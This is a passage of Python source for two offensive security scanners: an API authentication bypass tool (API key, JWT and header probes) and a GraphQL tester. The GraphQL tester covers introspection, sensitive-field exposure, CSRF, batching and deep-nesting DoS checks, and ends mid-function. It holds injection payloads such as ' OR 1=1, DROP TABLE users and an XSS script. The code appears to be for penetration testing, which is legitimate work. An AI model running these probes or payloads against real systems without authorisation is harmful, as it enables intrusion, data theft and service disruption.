        
        for location in locations:
            try:
                test_headers = self.headers.copy()
                params = {}
                
                if location["type"] == "header":
                    test_headers[location["name"]] = location["value"]
                else:  # param
                    params[location["name"]] = location["value"]
                
                response = self.session.get(url, headers=test_headers, params=params, timeout=10)
                
                result = {
                    "test_type": "api_key_bypass",
                    "endpoint": endpoint,
                    "location": location,
                    "status_code": response.status_code,
                    "response_length": len(response.text),
                    "success": self._is_successful_response(response)
                }
                
                self.results.append(result)
                
                if result["success"]:
                    self.log(f"API KEY BYPASS: Endpoint {endpoint} accessible with API key in {location['type']} {location['name']}: {location['value']}", "CRITICAL")
                    self.successful_bypasses.append(result)
                    
                # Small delay
                time.sleep(0.5)
                
            except Exception as e:
                self.log(f"Error testing API key in {location['type']} {location['name']} on {endpoint}: {str(e)}", "ERROR")
    
    def _create_test_jwt(self, payload, algorithm="HS256"):
        """Create a test JWT token with the specified payload"""
        # Add common JWT claims if not present
        if "iat" not in payload:
            payload["iat"] = int(time.time())
        if "exp" not in payload:
            payload["exp"] = int(time.time()) + 3600  # 1 hour
        if "jti" not in payload:
            payload["jti"] = ''.join(random.choices('abcdefghijklmnopqrstuvwxyz0123456789', k=10))
            
        # Create the JWT
        token = jwt.encode(payload, "test_secret", algorithm=algorithm)
        
        # Handle different JWT library versions
        if isinstance(token, bytes):
            return token.decode('utf-8')
        return token
        
    def _is_successful_response(self, response):
        """Determine if a response indicates successful access"""
        # Check status code (2xx is usually success)
        if 200 <= response.status_code < 300:
            return True
            
        # Check for common error messages or patterns in responses
        # that would indicate that auth failed
        error_indicators = [
            "not authorized", 
            "unauthorized", 
            "forbidden", 
            "access denied",
            "authentication required",
            "invalid token",
            "invalid api key",
            "permission denied"
        ]
        
        for indicator in error_indicators:
            if indicator in response.text.lower():
                return False
                
        # If it's a 4xx code, it might be auth failure, but let's check
        # If there's actual data in the response that seems like real content
        if 400 <= response.status_code < 500:
            content_indicators = ["data", "user", "id", "name", "result", "success"]
            
            try:
                # If it's JSON, check for data structure
                json_data = response.json()
                
                # If it has "data" or "results" keys, it might be valid content
                for key in json_data:
                    if key.lower() in content_indicators:
                        if json_data[key] is not None and json_data[key] != "" and json_data[key] != []:
                            return True
                            
                # No evidence of real content, probably auth failure
                return False
                
            except:
                # Not JSON, check text content
                if len(response.text) > 100:  # Arbitrary threshold
                    # If response is HTML, look for common tags indicating content
                    if "<html" in response.text.lower():
                        if "<table" in response.text.lower() or "<div" in response.text.lower():
                            return True
                    
                # No evidence of real content, probably auth failure
                return False
                
        return False
        
    def scan_endpoints(self, endpoints, valid_token=None):
        """Run all tests on the specified endpoints"""
        self.log(f"Starting scan on {len(endpoints)} endpoints")
        
        for endpoint in endpoints:
            self.log(f"\nTesting endpoint: {endpoint}")
            
            # Run all tests sequentially for each endpoint
            self.test_no_auth(endpoint)
            self.test_header_variations(endpoint, valid_token)
            self.test_jwt_vulnerabilities(endpoint, valid_token)
            self.test_oauth_vulnerabilities(endpoint)
            self.test_api_key_bypasses(endpoint)
            
        self.log(f"\nScan completed. Found {len(self.successful_bypasses)} potential bypasses.")
        self.save_results()
        
    def scan_with_threading(self, endpoints, valid_token=None):
        """Run tests with threading for faster scanning"""
        self.log(f"Starting threaded scan on {len(endpoints)} endpoints with {self.threads} threads")
        
        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            for endpoint in endpoints:
                executor.submit(self.test_no_auth, endpoint)
                executor.submit(self.test_header_variations, endpoint, valid_token)
                executor.submit(self.test_jwt_vulnerabilities, endpoint, valid_token)
                executor.submit(self.test_oauth_vulnerabilities, endpoint)
                executor.submit(self.test_api_key_bypasses, endpoint)
                
        self.log(f"\nThreaded scan completed. Found {len(self.successful_bypasses)} potential bypasses.")
        self.save_results()
        
    def save_results(self):
        """Save scan results to a file"""
        output = {
            "scan_info": {
                "target_url": self.target_url,
                "timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
                "total_tests": len(self.results),
                "successful_bypasses": len(self.successful_bypasses)
            },
            "successful_bypasses": self.successful_bypasses,
            "all_results": self.results
        }
        
        with open(self.output_file, 'w') as f:
            json.dump(output, f, indent=2)
            
        self.log(f"Results saved to {self.output_file}")
        
    def print_summary(self):
        """Print a summary of findings"""
        print("\n" + "="*60)
        print(f"API AUTHENTICATION BYPASS SUMMARY FOR {self.target_url}")
        print("="*60)
        
        if not self.successful_bypasses:
            print("\nNo successful bypass techniques found.")
        else:
            print(f"\nSuccessful Bypasses: {len(self.successful_bypasses)}")
            
            # Group by test type
            bypass_types = {}
            for bypass in self.successful_bypasses:
                test_type = bypass.get('test_type', 'Unknown')
                if test_type not in bypass_types:
                    bypass_types[test_type] = []
                    
                bypass_types[test_type].append(bypass)
                
            # Print by type
            for test_type, bypasses in bypass_types.items():
                print(f"\n{test_type.upper()} BYPASSES ({len(bypasses)}):")
                
                for i, bypass in enumerate(bypasses, 1):
                    endpoint = bypass.get('endpoint', 'Unknown')
                    
                    if test_type == "no_auth":
                        print(f"  {i}. Endpoint accessible without authentication: {endpoint}")
                    elif test_type == "header_variation":
                        variation = bypass.get('variation', {})
                        print(f"  {i}. Endpoint {endpoint} accessible with: {variation}")
                    elif test_type == "jwt_vulnerability":
                        token = bypass.get('token', '')
                        if len(token) > 20:
                            token = token[:20] + "..."
                        print(f"  {i}. Endpoint {endpoint} accessible with JWT: {token}")
                    elif test_type == "oauth_vulnerability":
                        params = bypass.get('params', {})
                        print(f"  {i}. Endpoint {endpoint} accessible with OAuth params: {params}")
                    elif test_type == "api_key_bypass":
                        location = bypass.get('location', {})
                        print(f"  {i}. Endpoint {endpoint} accessible with API key in {location.get('type')} {location.get('name')}: {location.get('value')}")
                    else:
                        print(f"  {i}. Unknown bypass type for endpoint: {endpoint}")
                        
        print("\nTotal Tests Run:", len(self.results))
        print(f"Full results saved to: {self.output_file}")
        print("="*60 + "\n")

# Example usage
def main():
    parser = argparse.ArgumentParser(description="API Authentication Bypass Tool")
    parser.add_argument("url", help="Base URL of the API to test")
    parser.add_argument("-e", "--endpoints", help="Comma-separated list of endpoints to test")
    parser.add_argument("-f", "--file", help="File containing endpoints (one per line)")
    parser.add_argument("-t", "--token", help="Valid JWT token for comparison tests")
    parser.add_argument("-o", "--output", help="Output file for results")
    parser.add_argument("-c", "--concurrency", type=int, default=5, help="Number of concurrent threads")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
    
    args = parser.parse_args()
    
    # Get endpoints list
    endpoints = []
    if args.endpoints:
        endpoints = [e.strip() for e in args.endpoints.split(',') if e.strip()]
    elif args.file:
        try:
            with open(args.file, 'r') as f:
                endpoints = [line.strip() for line in f if line.strip()]
        except Exception as e:
            print(f"Error reading endpoints file: {e}")
            sys.exit(1)
    else:
        # Default endpoints to try
        endpoints = [
            "users", "user", "admin", "admins", "account", "accounts",
            "profile", "profiles", "login", "logout", "auth", "authenticate",
            "token", "api/users", "api/admin", "api/v1/users", "api/v1/admin",
            "v1/users", "v1/user", "v1/admin", "api/account", "api/profile"
        ]
    
    scanner = APIAuthBypass(
        target_url=args.url,
        output_file=args.output,
        threads=args.concurrency,
        verbose=args.verbose
    )
    
    if args.concurrency > 1:
        scanner.scan_with_threading(endpoints, args.token)
    else:
        scanner.scan_endpoints(endpoints, args.token)
        
    scanner.print_summary()
    
if __name__ == "__main__":
    main()

GraphQL Security Testing Framework

# GraphQL API Security Testing Framework
import requests
import json
import argparse
import time
import os
import sys
from concurrent.futures import ThreadPoolExecutor

class GraphQLSecurity:
    def __init__(self, endpoint, headers=None, output_dir=None, threads=5, verbose=False):
        self.endpoint = endpoint
        self.headers = headers or {}
        self.output_dir = output_dir or "graphql_results"
        self.threads = threads
        self.verbose = verbose
        self.session = requests.Session()
        
        # Ensure headers contain content-type for GraphQL
        if 'Content-Type' not in self.headers:
            self.headers['Content-Type'] = 'application/json'
            
        # Create output directory if it doesn't exist
        if not os.path.exists(self.output_dir):
            os.makedirs(self.output_dir)
            
        # Results storage
        self.schema = None
        self.types = []
        self.queries = []
        self.mutations = []
        self.fields = {}
        self.vulnerabilities = []
        
    def log(self, message, level="INFO"):
        """Log messages based on verbosity"""
        if self.verbose or level in ["ERROR", "CRITICAL", "WARNING"]:
            timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
            print(f"[{timestamp}] [{level}] {message}")
            
    def run_query(self, query, variables=None, operation_name=None):
        """Execute a GraphQL query"""
        payload = {
            "query": query
        }
        
        if variables:
            payload["variables"] = variables
            
        if operation_name:
            payload["operationName"] = operation_name
            
        try:
            response = self.session.post(
                self.endpoint,
                headers=self.headers,
                json=payload,
                timeout=30
            )
            
            if response.status_code == 200:
                return response.json()
            else:
                self.log(f"Query failed with status code {response.status_code}: {response.text}", "ERROR")
                return None
                
        except Exception as e:
            self.log(f"Error executing query: {str(e)}", "ERROR")
            return None
            
    def get_schema(self):
        """Retrieve the GraphQL schema through introspection"""
        self.log("Retrieving GraphQL schema through introspection...")
        
        introspection_query = """
        query IntrospectionQuery {
          __schema {
            queryType {
              name
            }
            mutationType {
              name
            }
            subscriptionType {
              name
            }
            types {
              ...FullType
            }
            directives {
              name
              description
              locations
              args {
                ...InputValue
              }
            }
          }
        }

        fragment FullType on __Type {
          kind
          name
          description
          fields(includeDeprecated: true) {
            name
            description
            args {
              ...InputValue
            }
            type {
              ...TypeRef
            }
            isDeprecated
            deprecationReason
          }
          inputFields {
            ...InputValue
          }
          interfaces {
            ...TypeRef
          }
          enumValues(includeDeprecated: true) {
            name
            description
            isDeprecated
            deprecationReason
          }
          possibleTypes {
            ...TypeRef
          }
        }

        fragment InputValue on __InputValue {
          name
          description
          type {
            ...TypeRef
          }
          defaultValue
        }

        fragment TypeRef on __Type {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
                ofType {
                  kind
                  name
                  ofType {
                    kind
                    name
                    ofType {
                      kind
                      name
                      ofType {
                        kind
                        name
                      }
                    }
                  }
                }
              }
            }
          }
        }
        """
        
        result = self.run_query(introspection_query)
        
        if result and 'data' in result and '__schema' in result['data']:
            self.schema = result['data']['__schema']
            self.log("Successfully retrieved GraphQL schema")
            
            # Save schema to file
            with open(os.path.join(self.output_dir, "schema.json"), 'w') as f:
                json.dump(self.schema, f, indent=2)
                
            # Process schema information
            self._process_schema()
            return True
        else:
            self.log("Failed to retrieve GraphQL schema. Introspection may be disabled.", "WARNING")
            return False
            
    def _process_schema(self):
        """Process the retrieved schema to extract useful information"""
        if not self.schema:
            return
            
        self.log("Processing schema information...")
        
        # Extract types
        for type_info in self.schema['types']:
            # Skip introspection types
            if type_info['name'].startswith('__'):
                continue
                
            # Store type information
            self.types.append(type_info)
            
            # Extract fields for this type
            if type_info['fields']:
                self.fields[type_info['name']] = type_info['fields']
                
        # Find query type
        query_type_name = self.schema['queryType']['name']
        for type_info in self.types:
            if type_info['name'] == query_type_name and type_info['fields']:
                self.queries = type_info['fields']
                
        # Find mutation type
        if self.schema['mutationType'] and self.schema['mutationType']['name']:
            mutation_type_name = self.schema['mutationType']['name']
            for type_info in self.types:
                if type_info['name'] == mutation_type_name and type_info['fields']:
                    self.mutations = type_info['fields']
                    
        self.log(f"Found {len(self.types)} types, {len(self.queries)} queries, and {len(self.mutations)} mutations")
        
    def get_type_fields(self, type_name):
        """Get fields for a specific type"""
        return self.fields.get(type_name, [])
        
    def test_queries(self):
        """Test all available queries for security issues"""
        if not self.queries:
            self.log("No queries found to test", "WARNING")
            return
            
        self.log(f"Testing {len(self.queries)} queries for security issues...")
        
        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            executor.map(self.test_query, self.queries)
            
    def test_query(self, query_info):
        """Test a specific query for security issues"""
        query_name = query_info['name']
        self.log(f"Testing query: {query_name}")
        
        # Craft a minimal query
        args = self._build_args_for_query(query_info)
        query_string = f"query {{ {query_name}{args} }}"
        
        # Test direct access
        self.test_direct_access(query_name, query_string)
        
        # Test for excessive data exposure
        self.test_data_exposure(query_name, query_info)
        
        # Test for injection vulnerabilities
        self.test_injection(query_name, query_info)
        
    def test_mutations(self):
        """Test all available mutations for security issues"""
        if not self.mutations:
            self.log("No mutations found to test", "WARNING")
            return
            
        self.log(f"Testing {len(self.mutations)} mutations for security issues...")
        
        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            executor.map(self.test_mutation, self.mutations)
            
    def test_mutation(self, mutation_info):
        """Test a specific mutation for security issues"""
        mutation_name = mutation_info['name']
        self.log(f"Testing mutation: {mutation_name}")
        
        # Craft arguments for the mutation
        args = self._build_args_for_mutation(mutation_info)
        mutation_string = f"mutation {{ {mutation_name}{args} }}"
        
        # Test direct access
        self.test_direct_access(mutation_name, mutation_string, is_mutation=True)
        
        # Test for CSRF
        self.test_csrf(mutation_name, mutation_info)
        
        # Test for injection vulnerabilities
        self.test_injection(mutation_name, mutation_info, is_mutation=True)
        
    def _build_args_for_query(self, query_info):
        """Build arguments string for a query"""
        if not query_info['args']:
            return ""
            
        args_parts = []
        for arg in query_info['args']:
            # Generate a value based on the type
            value = self._generate_value_for_type(arg['type'])
            args_parts.append(f"{arg['name']}: {value}")
            
        if args_parts:
            return f"({', '.join(args_parts)})"
        return ""
        
    def _build_args_for_mutation(self, mutation_info):
        """Build arguments string for a mutation"""
        if not mutation_info['args']:
            return ""
            
        args_parts = []
        for arg in mutation_info['args']:
            # Generate a value based on the type
            value = self._generate_value_for_type(arg['type'])
            args_parts.append(f"{arg['name']}: {value}")
            
        if args_parts:
            return f"({', '.join(args_parts)})"
        return ""
        
    def _generate_value_for_type(self, type_info):
        """Generate a test value based on the GraphQL type"""
        # Handle non-null wrapper
        if type_info['kind'] == 'NON_NULL':
            return self._generate_value_for_type(type_info['ofType'])
            
        # Handle list wrapper
        if type_info['kind'] == 'LIST':
            inner_value = self._generate_value_for_type(type_info['ofType'])
            return f"[{inner_value}]"
            
        # Handle scalar types
        if type_info['kind'] == 'SCALAR':
            type_name = type_info['name']
            if type_name == 'Int':
                return "1"
            elif type_name == 'Float':
                return "1.0"
            elif type_name == 'String':
                return '"test"'
            elif type_name == 'Boolean':
                return "true"
            elif type_name == 'ID':
                return '"1"'
            else:
                return '"test"'  # Default for unknown scalar
                
        # Handle enum types
        if type_info['kind'] == 'ENUM':
            # Try to find the enum type to get a valid value
            for type_def in self.types:
                if type_def['name'] == type_info['name'] and type_def['enumValues']:
                    return type_def['enumValues'][0]['name']
            return "UNKNOWN_ENUM_VALUE"
            
        # Handle input object types
        if type_info['kind'] == 'INPUT_OBJECT':
            # Find the input object definition
            input_fields = []
            for type_def in self.types:
                if type_def['name'] == type_info['name'] and type_def['inputFields']:
                    for field in type_def['inputFields']:
                        field_value = self._generate_value_for_type(field['type'])
                        input_fields.append(f"{field['name']}: {field_value}")
                    break
                    
            if input_fields:
                return f"{{ {', '.join(input_fields)} }}"
            return "{}"  # Empty object as fallback
            
        # Default for any other type
        return "null"
        
    def test_direct_access(self, operation_name, operation_string, is_mutation=False):
        """Test if an operation can be accessed directly without proper authorization"""
        # Try with current credentials
        result = self.run_query(operation_string)
        
        # Check if the operation succeeded
        if result and 'data' in result and operation_name in result['data'] and result['data'][operation_name] is not None:
            # Check if this is a sensitive operation that should be restricted
            if any(keyword in operation_name.lower() for keyword in ['admin', 'delete', 'remove', 'update', 'create', 'user', 'account', 'private', 'secret', 'internal']):
                vulnerability = {
                    "type": "unauthorized_access",
                    "operation": operation_name,
                    "operation_type": "mutation" if is_mutation else "query",
                    "severity": "high" if is_mutation else "medium",
                    "description": f"The {'mutation' if is_mutation else 'query'} '{operation_name}' appears to be accessible without proper authorization.",
                    "proof": operation_string,
                    "response": result
                }
                
                self.log(f"VULNERABILITY: Unauthorized access to {operation_name}", "CRITICAL")
                self.vulnerabilities.append(vulnerability)
                
    def test_data_exposure(self, query_name, query_info):
        """Test if a query exposes sensitive data"""
        # Determine the return type of the query
        return_type = query_info['type']
        
        # Get to the base type (unwrap NON_NULL and LIST wrappers)
        while return_type['kind'] in ['NON_NULL', 'LIST']:
            return_type = return_type['ofType']
            
        # If it's not an object type, skip
        if return_type['kind'] != 'OBJECT':
            return
            
        type_name = return_type['name']
        
        # Get fields for this type
        type_fields = self.get_type_fields(type_name)
        if not type_fields:
            return
            
        # Look for sensitive field names
        sensitive_fields = []
        for field in type_fields:
            field_name = field['name'].lower()
            if any(keyword in field_name for keyword in ['password', 'token', 'secret', 'key', 'auth', 'credit', 'ssn', 'social', 'private', 'hidden']):
                sensitive_fields.append(field['name'])
                
        if not sensitive_fields:
            return
            
        # Craft a query requesting these fields
        field_string = " ".join(sensitive_fields)
        query_string = f"query {{ {query_name} {{ {field_string} }} }}"
        
        # Run the query
        result = self.run_query(query_string)
        
        # Check if we got sensitive data
        if result and 'data' in result and query_name in result['data'] and result['data'][query_name] is not None:
            # Check if any of the sensitive fields have values
            data = result['data'][query_name]
            exposed_fields = []
            
            if isinstance(data, dict):
                for field in sensitive_fields:
                    if field in data and data[field] is not None and data[field] != "":
                        exposed_fields.append(field)
            elif isinstance(data, list) and data:
                for item in data:
                    if isinstance(item, dict):
                        for field in sensitive_fields:
                            if field in item and item[field] is not None and item[field] != "":
                                exposed_fields.append(field)
                                break
                        
            if exposed_fields:
                vulnerability = {
                    "type": "sensitive_data_exposure",
                    "operation": query_name,
                    "severity": "high",
                    "description": f"The query '{query_name}' exposes sensitive fields: {', '.join(exposed_fields)}",
                    "proof": query_string,
                    "exposed_fields": exposed_fields,
                    "response": result
                }
                
                self.log(f"VULNERABILITY: Sensitive data exposure in {query_name}: {', '.join(exposed_fields)}", "CRITICAL")
                self.vulnerabilities.append(vulnerability)
                
    def test_injection(self, operation_name, operation_info, is_mutation=False):
        """Test for injection vulnerabilities in operation arguments"""
        if not operation_info['args']:
            return
            
        # Test each argument for injection vulnerabilities
        for arg in operation_info['args']:
            arg_name = arg['name']
            arg_type = arg['type']
            
            # Only test string arguments
            base_type = arg_type
            while base_type['kind'] in ['NON_NULL', 'LIST']:
                base_type = base_type['ofType']
                
            if base_type['name'] != 'String':
                continue
                
            # Test with various injection payloads
            payloads = [
                "' OR 1=1 --",
                "\\\"; DROP TABLE users; --",
                "${process.env.NODE_ENV}",
                "'; return true; /*",
                "</script><script>alert(1)</script>",
                "'; return db.users.find(); /*"
            ]
            
            for payload in payloads:
                # Craft operation with the payload
                args_str = f"({arg_name}: \"{payload}\")"
                operation_string = f"{'mutation' if is_mutation else 'query'} {{ {operation_name}{args_str} }}"
                
                # Run the operation
                result = self.run_query(operation_string)
                
                # Check for signs of successful injection
                if result:
                    # Check for error messages indicating injection vulnerability
                    if 'errors' in result:
                        for error in result['errors']:
                            error_msg = error.get('message', '').lower()
                            
                            # Look for error messages that suggest SQL/NoSQL injection
                            if any(keyword in error_msg for keyword in ['sql', 'syntax', 'mongo', 'database', 'invalid query', 'unexpected token']):
                                vulnerability = {
                                    "type": "injection_vulnerability",
                                    "operation": operation_name,
                                    "operation_type": "mutation" if is_mutation else "query",
                                    "argument": arg_name,
                                    "payload": payload,
                                    "severity": "critical",
                                    "description": f"The {'mutation' if is_mutation else 'query'} '{operation_name}' appears vulnerable to injection through the '{arg_name}' argument.",
                                    "proof": operation_string,
                                    "error": error
                                }
                                
                                self.log(f"VULNERABILITY: Injection in {operation_name} via {arg_name}", "CRITICAL")
                                self.vulnerabilities.append(vulnerability)
                                break
                    
                    # If we got successful response, check if it's unexpected
                    elif 'data' in result and operation_name in result['data'] and result['data'][operation_name]:
                        # If this is a mutation that succeeded with an injection payload, that's suspicious
                        if is_mutation and any(keyword in payload for keyword in ["'", "\""]):
                            vulnerability = {
                                "type": "potential_injection_vulnerability",
                                "operation": operation_name,
                                "operation_type": "mutation",
                                "argument": arg_name,
                                "payload": payload,
                                "severity": "high",
                                "description": f"The mutation '{operation_name}' accepted a payload with quotes in the '{arg_name}' argument, suggesting potential insufficient input validation.",
                                "proof": operation_string,
                                "response": result
                            }
                            
                            self.log(f"VULNERABILITY: Potential injection in {operation_name} via {arg_name}", "CRITICAL")
                            self.vulnerabilities.append(vulnerability)
                            
    def test_csrf(self, mutation_name, mutation_info):
        """Test if a mutation is vulnerable to CSRF"""
        # Create a simple request to test if mutation works without CSRF protection
        args = self._build_args_for_mutation(mutation_info)
        mutation_string = f"mutation {{ {mutation_name}{args} }}"
        
        # First try with normal request (with all headers)
        result1 = self.run_query(mutation_string)
        
        # Now try with minimal headers (simulate CSRF scenario)
        minimal_headers = {'Content-Type': 'application/json'}
        
        try:
            response = requests.post(
                self.endpoint,
                headers=minimal_headers,
                json={"query": mutation_string},
                timeout=30
            )
            
            if response.status_code == 200:
                result2 = response.json()
                
                # Check if both requests worked, suggesting no CSRF protection
                if (result1 and 'data' in result1 and mutation_name in result1['data'] and 
                    result2 and 'data' in result2 and mutation_name in result2['data']):
                    
                    vulnerability = {
                        "type": "csrf_vulnerability",
                        "operation": mutation_name,
                        "severity": "high",
                        "description": f"The mutation '{mutation_name}' appears to be vulnerable to CSRF as it works without session-specific headers.",
                        "proof": mutation_string,
                        "response": result2
                    }
                    
                    self.log(f"VULNERABILITY: CSRF vulnerability in {mutation_name}", "CRITICAL")
                    self.vulnerabilities.append(vulnerability)
                    
        except Exception as e:
            self.log(f"Error testing CSRF for {mutation_name}: {str(e)}", "ERROR")
            
    def test_batching(self):
        """Test if the API is vulnerable to batch attacks"""
        if not self.queries:
            return
            
        self.log("Testing for GraphQL batching/DoS vulnerabilities...")
        
        # Pick a simple query to use for batching
        query = None
        for q in self.queries:
            if not q['args']:  # prefer queries without arguments
                query = q
                break
                
        if not query:
            query = self.queries[0]
            
        query_name = query['name']
        
        # Create a simple query
        simple_query = f"query {{ {query_name} }}"
        
        # Create batched queries of increasing size
        batch_sizes = [5, 20, 50, 100]
        
        for size in batch_sizes:
            # Create an array of the same query
            batch = [{"query": simple_query} for _ in range(size)]
            
            self.log(f"Testing batch of {size} queries...")
            
            try:
                start_time = time.time()
                response = requests.post(
                    self.endpoint,
                    headers=self.headers,
                    json=batch,
                    timeout=60
                )
                end_time = time.time()
                
                execution_time = end_time - start_time
                
                if response.status_code == 200:
                    try:
                        results = response.json()
                        
                        # Check if batching worked
                        if isinstance(results, list) and len(results) == size:
                            vulnerability = {
                                "type": "batch_query_vulnerability",
                                "batch_size": size,
                                "execution_time": execution_time,
                                "severity": "medium",
                                "description": f"The API allows batching {size} queries in a single request, which could be used for DoS attacks or resource exhaustion.",
                                "proof": f"Batch of {size} '{query_name}' queries",
                            }
                            
                            self.log(f"VULNERABILITY: Batch query vulnerability with size {size}, executed in {execution_time:.2f} seconds", "WARNING")
                            self.vulnerabilities.append(vulnerability)
                            
                    except Exception as e:
                        self.log(f"Error parsing batched response: {str(e)}", "ERROR")
                        
            except Exception as e:
                self.log(f"Error testing batch size {size}: {str(e)}", "ERROR")
                
    def test_query_depth(self):
        """Test if the API is vulnerable to deep nested queries"""
        if not self.types:
            return
            
        self.log("Testing for nested query/DoS vulnerabilities...")
        
        # Find a type with recursive potential (references itself or can be nested)
        recursive_type = None
        recursive_field = None
        
        for type_info in self.types:
            if type_info['kind'] != 'OBJECT' or not type_info['fields']:
                continue
                
            type_name = type_info['name']
            
            for field in type_info['fields']:
                field_type = field['type']
                
                # Get to the base type
                while field_type['kind'] in ['NON_NULL', 'LIST']:
                    field_type = field_type['ofType']
                    
                # Check if this field references back to the same type
                # or any type that has a field referencing this type
                if field_type['kind'] == 'OBJECT' and (field_type['name'] == type_name or 
                    any(f['type']['name'] == type_name for t in self.types 
                        for f in (t['fields'] or []) if t['name'] == field_type['name'])):
                    recursive_type = type_name
                    recursive_field = field['name']
                    break
                    
            if recursive_type:
                break
                
        if not recursive_type or not recursive_field:
            self.log("Could not find recursive types for nested query test", "WARNING")
            return
            
        # Find a query that returns this type
        query_for_type = None
        
        for query in self.queries:
            return_type = query['type']
            
            # Get to the base type
            while return_type['kind'] in ['NON_NULL', 'LIST']:
                return_type = return_type['ofType']
                
            if return_type['kind'] == 'OBJECT' and return_type['name'] == recursive_type:
                query_for_type = query
                break
                
        if not query_for_type:
            self.log(f"Could not find a query returning the recursive type {recursive_type}", "WARNING")
            return
            
        # Create nested queries of increasing depth
        depths = [5, 10, 20, 50]
        
        for depth in depths:
            # Create the nested field selection
            nested_fields = recursive_field
            for _ in range(depth):
                nested_fields = f"{recursive_field} {{ {nested_fields} }}"
                
            query_string = f"query {{ {query_for_type['name']} {{ {nested_fields} }} }}"
            
            self.log(f"Testing nested query with depth {depth}...")
            
            try:
                start_time = time.time()
                result = self.run_query(query_string)
                end_time = time.time()
                
                execution_time = end_time - start_time
                
                # If query didn't fail, it may be vulnerable
                if result and 'data' in result and query_for_type['name'] in result['data']:
                    vulnerability = {
                        "type": "nested_query_vulnerability",
                        "depth": depth,
                        "execution_time": execution_time,
                        "severity": "medium",
                        "description": f"The API allows deeply nested queries (depth {depth}), which could be used for DoS attacks.",
                        "proof": query_string,
                    }
                    
                    self.log(f"VULNERABILITY: Nested query vulnerability with depth {depth}, executed in {execution_time:.2f} seconds", "WARNING")
                    self.vulnerabilities.append(vulnerability)
                    
            except Exception as e:
                self.log(f"Error testing depth {depth}: {str(e)}", "ERROR")
                
    def save_vulnerabilities(self):
        """Save found vulnerabilities to file"""
        if not self.vulnerabilities:
            self.log("No vulnerabilities found to save")
            return
            
        output_file = os.path.join(self.output_dir, "vulnerabilities.json")
        
        with open(output_file, 'w') as f:
            json.dump({
                "endpoint": self.endpoint,
                "timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
                "vulnerabilities": self.vulnerabilities
            }, f, indent=2)
            
        self.log(f"Saved {len(self.vulnerabilities)} vulnerabilities to {output_file}")
        
    def generate_report(self):
        """Generate a comprehensive security report"""
        report_file = os.path.join(self.output_dir, "report.md")
        
        with open(report_file, 'w') as f:
            f.write(f"# GraphQL Security Assessment Report\n\n")
            f.write(f"**Endpoint:** {self.endpoint}  \n")
            f.write(f"**Date:** {time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())}  \n\n")
            
            f.write("## Summary\n\n")
            
            if self.schema:
                f.write(f"- API uses GraphQL {self.schema.get('schemaVersion', 'unknown version')}  \n")
                f.write(f"- Found {len(self.types)} types  \n")
                f.write(f"- Found {len(self.queries)} queries  \n")
                f.write(f"- Found {len(self.mutations)} mutations  \n")
            else:
                f.write("- Failed to retrieve schema (introspection might be disabled)  \n")
                
            f.write(f"- Found {len(self.vulnerabilities)} security vulnerabilities  \n\n")
            
            # Group vulnerabilities by severity
            vulnerabilities_by_severity = {
                "critical": [],
                "high": [],
                "medium": [],
                "low": []
            }
            
            for vuln in self.vulnerabilities:
                severity = vuln.get("severity", "medium")
                vulnerabilities_by_severity[severity].append(vuln)
                
            f.write("## Vulnerabilities\n\n")
            
            for severity in ["critical", "high", "medium", "low"]:
                vulns = vulnerabilities_by_severity[severity]
                if not vulns:
                    continue
                    
                f.write(f"### {severity.capitalize()} Severity ({len(vulns)})\n\n")
                
                for i, vuln in enumerate(vulns, 1):
                    f.write(f"#### {i}. {vuln['type'].replace('_', ' ').title()}\n\n")
                    f.write(f"**Operation:** {vuln.get('operation', 'N/A')}  \n")
                    if 'operation_type' in vuln:
                        f.write(f"**Type:** {vuln['operation_type']}  \n")
                    if 'argument' in vuln:
                        f.write(f"**Argument:** {vuln['argument']}  \n")
                    f.write(f"**Description:** {vuln['description']}  \n")
                    f.write(f"**Proof:** `{vuln.get('proof', 'N/A')}`  \n\n")
                    
            f.write("## Recommendations\n\n")
            
            # Add recommendations based on found vulnerabilities
            recommendations = set()
            
            for vuln in self.vulnerabilities:
                vuln_type = vuln.get('type')
                
                if vuln_type == 'unauthorized_access':
                    recommendations.add("Implement proper authorization checks for all operations")
                elif vuln_type == 'sensitive_data_exposure':
                    recommendations.add("Apply field-level authorization to prevent exposure of sensitive data")
                elif vuln_type == 'injection_vulnerability':
                    recommendations.add("Implement input validation and sanitization for all arguments")
                elif vuln_type == 'csrf_vulnerability':
                    recommendations.add("Add CSRF protection mechanisms such as tokens or SameSite cookies")
                elif vuln_type == 'batch_query_vulnerability':
                    recommendations.add("Implement limits on batched queries or disable batching")
                elif vuln_type == 'nested_query_vulnerability':
                    recommendations.add("Implement query depth limits to prevent deeply nested queries")
                    
            # Add default recommendations
            recommendations.add("Disable introspection in production unless absolutely necessary")
            recommendations.add("Implement query complexity analysis to prevent DoS attacks")
            recommendations.add("Use a GraphQL-specific security library or middleware")
            
            for i, recommendation in enumerate(recommendations, 1):
                f.write(f"{i}. {recommendation}  \n")
                
        self.log(f"Generated security report at {report_file}")
        return report_file
        
    def run_all_tests(self):
        """Run all security tests"""
        # Get schema first
        self.get_schema()
        
        # Run tests
        self.test_queries()
        self.test_mutations()
        self.test_batching()
        self.test_query_depth()
        
        # Save results
        self.save_vulnerabilities()
        
        # Generate report
        self.generate_report()
        
        # Print summary
        self.print_summary()
        
    def print_summary(self):
        """Print a summary of findings"""
        print("\n" + "="*60)
        print(f"GRAPHQL SECURITY ASSESSMENT SUMMARY FOR {self.endpoint}")
        print("="*60)
        
        if self.schema:
            print(f"\nSchema Information:")
            print(f"  - Types: {len(self.types)}")
            print(f"  - Queries: {len(self.queries)}")
            print(f"  - Mutations: {len(self.mutations)}")
        else:
            print("\nSchema: Failed to retrieve (introspection might be disabled)")
            
        print(f"\nVulnerabilities Found: {len(self.vulnerabilities)}")
        
        # Group by type
        vuln_types = {}
        for vuln in self.vulnerabilities:
            vuln_type = vuln.get('type', 'Unknown')
            vuln_types[vuln_type] = vuln_types.get(vuln_type, 0) + 1
            
        # Group by severity
        vuln_severities = {}
        for vuln in self.vulnerabilities:
            severity = vuln.get('severity', 'Unknown')
            vuln_severities[severity] = vuln_severities.get(severity, 0) + 1
